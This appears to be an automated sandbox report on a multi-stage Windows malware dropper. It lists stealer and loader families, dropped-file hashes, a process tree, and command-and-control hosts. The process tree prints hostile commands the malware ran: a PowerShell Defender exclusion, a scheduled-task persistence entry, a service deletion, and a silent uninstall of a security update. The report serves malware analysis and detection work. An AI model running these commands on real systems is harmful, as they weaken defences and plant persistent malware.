memory/2832-464-0x0000000003110000-0x0000000003446000-memory.dmp

memory/2572-465-0x0000000002810000-0x0000000002C08000-memory.dmp

memory/2572-466-0x0000000002C10000-0x00000000034FB000-memory.dmp

memory/2572-467-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2132-468-0x0000000000400000-0x0000000000736000-memory.dmp

\ProgramData\nss3.dll

MD5 1d82785a31ff1daa68547dbcf420e953
SHA1 63e6973b9d0eb4edd402541b6c5411de96c5617f
SHA256 7f60ece436bf9d9abc72a3747992bc7d266a031c4c93e0a06ac205d7b1a7f559
SHA512 3852488cdcb0dd1f185a9d2aeb90b0e4f7615ed8035346b6e861e8aa9f6ae3f8b4682b30d5c235c6c9159e4b0d5370ab2a4ff613630dccc7c17e9d15f7709c9f

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/2132-483-0x0000000002760000-0x0000000002802000-memory.dmp

\Windows\rss\csrss.exe

MD5 dd76b1ea2a8bf2f7e800e0a11f01f5e9
SHA1 d31c1ff5b3bfff45af20f5fce0579b80819c5390
SHA256 98ddd0a4e39f3693a0bdda3844934a3211e119eee2d5155e17778b0af18e6b89
SHA512 2b3118524ede04678a6306af55dff202a5dbd1a5443bd815dc6a7e3122518ca3593841b942b46b04c3053e553cf20c8baca39461f27cc7fe5d293e26050b2508

memory/2572-499-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2132-508-0x0000000000400000-0x0000000000736000-memory.dmp

memory/2856-509-0x0000000002650000-0x0000000002A48000-memory.dmp

memory/1932-514-0x0000000000920000-0x0000000000A20000-memory.dmp

memory/1932-516-0x0000000000400000-0x0000000000822000-memory.dmp

memory/2856-519-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1932-532-0x0000000000400000-0x0000000000822000-memory.dmp

memory/1616-538-0x000000001B130000-0x000000001B412000-memory.dmp

memory/1616-539-0x00000000023D0000-0x00000000023D8000-memory.dmp

memory/1616-540-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/1616-543-0x00000000027B0000-0x0000000002830000-memory.dmp

memory/1616-544-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/1616-545-0x00000000027B0000-0x0000000002830000-memory.dmp

memory/1616-546-0x00000000027B0000-0x0000000002830000-memory.dmp

memory/1616-547-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 bb48f32ec35fa74ad3c24a668a2088c1
SHA1 de7c993fcf955f6173985e72b67ea68602068999
SHA256 0a4a3937e1a5777cb37d7296b09d6d33aa9588a3eccea96ace33ec42c5acac9c
SHA512 f1923f9e7b2c64fd4658967370dfe85b3a65d54eed967ff41ab3a5d70276c93530bac0e514038bb20a43af2a5efd5f1e8323af6110aa12fdec1d8828a3f0b9d8

C:\Users\Admin\AppData\Local\Temp\Cab908E.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\Tar918B.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-22 06:18

Reported

2024-02-22 06:21

Platform

win10v2004-20240221-en

Max time kernel

67s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe"

Signatures

DcRat

rat infostealer dcrat

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

Detects Windows executables referencing non-Windows User-Agents

Description Indicator Process Target
N/A N/A N/A N/A

Detects executables Discord URL observed in first stage droppers

Description Indicator Process Target
N/A N/A N/A N/A

Detects executables containing URLs to raw contents of a Github gist

Description Indicator Process Target
N/A N/A N/A N/A

Detects executables containing artifacts associated with disabling Widnows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detects executables packed with VMProtect.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many varying, potentially fake Windows User-Agents

Description Indicator Process Target
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\D562.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\8FBC.exe N/A

Checks installed software on the system

discovery

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Users\Admin\AppData\Local\Temp\6F31.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2660 set thread context of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\E31F.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\E31F.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\E31F.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\nskF6E0.tmp N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\nskF6E0.tmp N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SO10D.tmp\F86D.tmp N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3428 wrote to memory of 4972 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3428 wrote to memory of 4972 N/A N/A C:\Windows\system32\regsvr32.exe
PID 4972 wrote to memory of 3136 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4972 wrote to memory of 3136 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4972 wrote to memory of 3136 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3428 wrote to memory of 4968 N/A N/A C:\Users\Admin\AppData\Local\Temp\6F31.exe
PID 3428 wrote to memory of 4968 N/A N/A C:\Users\Admin\AppData\Local\Temp\6F31.exe
PID 3428 wrote to memory of 4968 N/A N/A C:\Users\Admin\AppData\Local\Temp\6F31.exe
PID 3428 wrote to memory of 4552 N/A N/A C:\Users\Admin\AppData\Local\Temp\7D7A.exe
PID 3428 wrote to memory of 4552 N/A N/A C:\Users\Admin\AppData\Local\Temp\7D7A.exe
PID 3428 wrote to memory of 4552 N/A N/A C:\Users\Admin\AppData\Local\Temp\7D7A.exe
PID 3428 wrote to memory of 2304 N/A N/A C:\Users\Admin\AppData\Local\Temp\89C0.exe
PID 3428 wrote to memory of 2304 N/A N/A C:\Users\Admin\AppData\Local\Temp\89C0.exe
PID 3428 wrote to memory of 2304 N/A N/A C:\Users\Admin\AppData\Local\Temp\89C0.exe
PID 3428 wrote to memory of 2660 N/A N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 3428 wrote to memory of 2660 N/A N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 3428 wrote to memory of 2660 N/A N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 2304 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\89C0.exe C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp
PID 2304 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\89C0.exe C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp
PID 2304 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\89C0.exe C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp
PID 3428 wrote to memory of 2240 N/A N/A C:\Users\Admin\AppData\Local\Temp\922E.exe
PID 3428 wrote to memory of 2240 N/A N/A C:\Users\Admin\AppData\Local\Temp\922E.exe
PID 3428 wrote to memory of 2240 N/A N/A C:\Users\Admin\AppData\Local\Temp\922E.exe
PID 2660 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 2660 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 2660 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 2660 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 2660 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 2660 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 2660 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 2660 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 1436 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 1436 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 1436 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 1436 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 1436 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 1436 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 3428 wrote to memory of 1460 N/A N/A C:\Users\Admin\AppData\Local\Temp\D562.exe
PID 3428 wrote to memory of 1460 N/A N/A C:\Users\Admin\AppData\Local\Temp\D562.exe
PID 3428 wrote to memory of 1460 N/A N/A C:\Users\Admin\AppData\Local\Temp\D562.exe
PID 3428 wrote to memory of 2112 N/A N/A C:\Users\Admin\AppData\Local\Temp\E31F.exe
PID 3428 wrote to memory of 2112 N/A N/A C:\Users\Admin\AppData\Local\Temp\E31F.exe
PID 3428 wrote to memory of 2112 N/A N/A C:\Users\Admin\AppData\Local\Temp\E31F.exe
PID 1460 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\D562.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 1460 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\D562.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 1460 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\D562.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 1460 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\D562.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1460 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\D562.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1460 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\D562.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1460 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\D562.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 1460 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\D562.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 1904 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1904 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1904 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1904 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nskF6E0.tmp
PID 1904 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nskF6E0.tmp
PID 1904 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nskF6E0.tmp
PID 3428 wrote to memory of 2944 N/A N/A C:\Users\Admin\AppData\Local\Temp\F86D.exe
PID 3428 wrote to memory of 2944 N/A N/A C:\Users\Admin\AppData\Local\Temp\F86D.exe
PID 3428 wrote to memory of 2944 N/A N/A C:\Users\Admin\AppData\Local\Temp\F86D.exe
PID 2944 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\F86D.exe C:\Users\Admin\AppData\Local\Temp\is-SO10D.tmp\F86D.tmp
PID 2944 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\F86D.exe C:\Users\Admin\AppData\Local\Temp\is-SO10D.tmp\F86D.tmp
PID 2944 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\F86D.exe C:\Users\Admin\AppData\Local\Temp\is-SO10D.tmp\F86D.tmp
PID 2612 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe

"C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe"

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\6D3C.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\6D3C.dll

C:\Users\Admin\AppData\Local\Temp\6F31.exe

C:\Users\Admin\AppData\Local\Temp\6F31.exe

C:\Users\Admin\AppData\Local\Temp\7D7A.exe

C:\Users\Admin\AppData\Local\Temp\7D7A.exe

C:\Users\Admin\AppData\Local\Temp\89C0.exe

C:\Users\Admin\AppData\Local\Temp\89C0.exe

C:\Users\Admin\AppData\Local\Temp\8FBC.exe

C:\Users\Admin\AppData\Local\Temp\8FBC.exe

C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp

"C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp" /SL5="$90246,3536428,54272,C:\Users\Admin\AppData\Local\Temp\89C0.exe"

C:\Users\Admin\AppData\Local\Temp\922E.exe

C:\Users\Admin\AppData\Local\Temp\922E.exe

C:\Users\Admin\AppData\Local\Temp\8FBC.exe

C:\Users\Admin\AppData\Local\Temp\8FBC.exe

C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe

"C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe" -i

C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe

"C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe" -s

C:\Users\Admin\AppData\Local\Temp\D562.exe

C:\Users\Admin\AppData\Local\Temp\D562.exe

C:\Users\Admin\AppData\Local\Temp\E31F.exe

C:\Users\Admin\AppData\Local\Temp\E31F.exe

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\F86D.exe

C:\Users\Admin\AppData\Local\Temp\F86D.exe

C:\Users\Admin\AppData\Local\Temp\nskF6E0.tmp

C:\Users\Admin\AppData\Local\Temp\nskF6E0.tmp

C:\Users\Admin\AppData\Local\Temp\is-SO10D.tmp\F86D.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SO10D.tmp\F86D.tmp" /SL5="$10254,4081152,54272,C:\Users\Admin\AppData\Local\Temp\F86D.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Users\Admin\AppData\Local\Folder To Iso 2.0\foldertoiso20.exe

"C:\Users\Admin\AppData\Local\Folder To Iso 2.0\foldertoiso20.exe" -i

C:\Users\Admin\AppData\Local\Folder To Iso 2.0\foldertoiso20.exe

"C:\Users\Admin\AppData\Local\Folder To Iso 2.0\foldertoiso20.exe" -s

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Roaming\uhgjcbw

C:\Users\Admin\AppData\Roaming\uhgjcbw

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3728 -ip 3728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3728 -s 764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4028 -ip 4028

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 2420

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "UTIXDCVF"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

Network

Country Destination Domain Proto
US 8.8.8.8:53 selebration17io.io udp
RU 91.215.85.120:80 selebration17io.io tcp
US 8.8.8.8:53 120.85.215.91.in-addr.arpa udp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 resergvearyinitiani.shop udp
US 104.21.94.2:443 resergvearyinitiani.shop tcp
US 8.8.8.8:53 2.94.21.104.in-addr.arpa udp
US 8.8.8.8:53 technologyenterdo.shop udp
US 104.21.80.118:443 technologyenterdo.shop tcp
US 8.8.8.8:53 118.80.21.104.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 8.8.8.8:53 detectordiscusser.shop udp
US 104.21.60.92:443 detectordiscusser.shop tcp
US 8.8.8.8:53 92.60.21.104.in-addr.arpa udp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 8.8.8.8:53 turkeyunlikelyofw.shop udp
US 172.67.202.191:443 turkeyunlikelyofw.shop tcp
US 8.8.8.8:53 associationokeo.shop udp
US 8.8.8.8:53 191.202.67.172.in-addr.arpa udp
US 172.67.147.18:443 associationokeo.shop tcp
US 8.8.8.8:53 18.147.67.172.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 trmpc.com udp
KR 211.119.84.111:80 trmpc.com tcp
US 8.8.8.8:53 111.84.119.211.in-addr.arpa udp
US 8.8.8.8:53 en.bestsup.su udp
US 104.21.29.103:80 en.bestsup.su tcp
US 8.8.8.8:53 103.29.21.104.in-addr.arpa udp
DE 217.182.198.95:443 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
AT 109.70.100.14:443 tcp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
DE 185.172.128.127:80 185.172.128.127 tcp
US 8.8.8.8:53 127.128.172.185.in-addr.arpa udp
AT 109.70.100.29:443 tcp
SE 45.15.16.116:9001 tcp
DE 185.172.128.145:80 185.172.128.145 tcp
CA 167.114.144.152:9002 tcp
US 204.13.164.118:443 tcp
US 8.8.8.8:53 145.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 118.164.13.204.in-addr.arpa udp
NL 45.128.232.69:443 tcp
DE 195.128.101.238:9001 tcp
US 8.8.8.8:53 69.232.128.45.in-addr.arpa udp
US 8.8.8.8:53 238.101.128.195.in-addr.arpa udp
DE 84.46.71.252:443 tcp
NL 45.128.232.69:443 tcp
DE 195.128.101.238:9001 tcp
DE 84.46.71.252:443 tcp
N/A 127.0.0.1:62418 tcp
US 8.8.8.8:53 gmx.cem udp
US 8.8.8.8:53 gmx.cem udp
US 8.8.8.8:53 jezywollbrd.cem udp
US 8.8.8.8:53 jezywollbrd.cem udp
US 8.8.8.8:53 up.bc.jh udp
US 8.8.8.8:53 up.bc.jh udp
US 8.8.8.8:53 ybhee.oj udp
US 8.8.8.8:53 gmbel.cem udp
US 8.8.8.8:53 ybhee.oj udp
